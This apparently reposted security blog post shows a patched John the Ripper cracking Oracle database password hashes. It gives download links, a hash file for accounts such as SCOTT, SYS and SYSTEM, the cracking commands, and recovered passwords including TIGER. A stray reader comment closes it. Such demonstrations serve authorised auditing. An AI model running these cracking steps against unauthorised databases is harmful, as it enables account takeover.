Oracle Pwnage Part 5 — Password Cracking with JTR
Posted by CG
Thanks to dentonj for pointing out to me their was an Oracle patch for John the Ripper.
I used the john from this site:
http://www.banquise.net/misc/patch-john.html
http://btb.banquise.net/bin/myjohn.tgz
cg@segfault:~/evil/john/run$ more oraclehashes
SCOTT:F894844C34402B67
SYS:E0F3062B9648608A
SYSTEM:7AD9669C7FE693C1
DBSNMP:E066D214D5421CCC
PROD:2E817F456CE5A4EC
TEST:7A0F2B316C212D67
cg@segfault:~/evil/john/run$ ./john oraclehashes –wordlist=password.lst
Loaded 6 password hashes with 6 different salts (Oracle [oracle])
TIGER (SCOTT)
DBSNMP (DBSNMP)
TEST (TEST)
guesses: 3 time: 0:00:00:00 100% c/s: 133842 trying: ZHONGGUO
cg@segfault:~/evil/john/run$ ./john –i oraclehashes
Loaded 3 password hashes with 3 different salts (Oracle [oracle])
Warning: mixed-case charset, but the current hash type is case-insensitive;
some candidate passwords may be unnecessarily tried more than once.
PROD (PROD)
…
鬼仔兄你用的是啥缓存插件?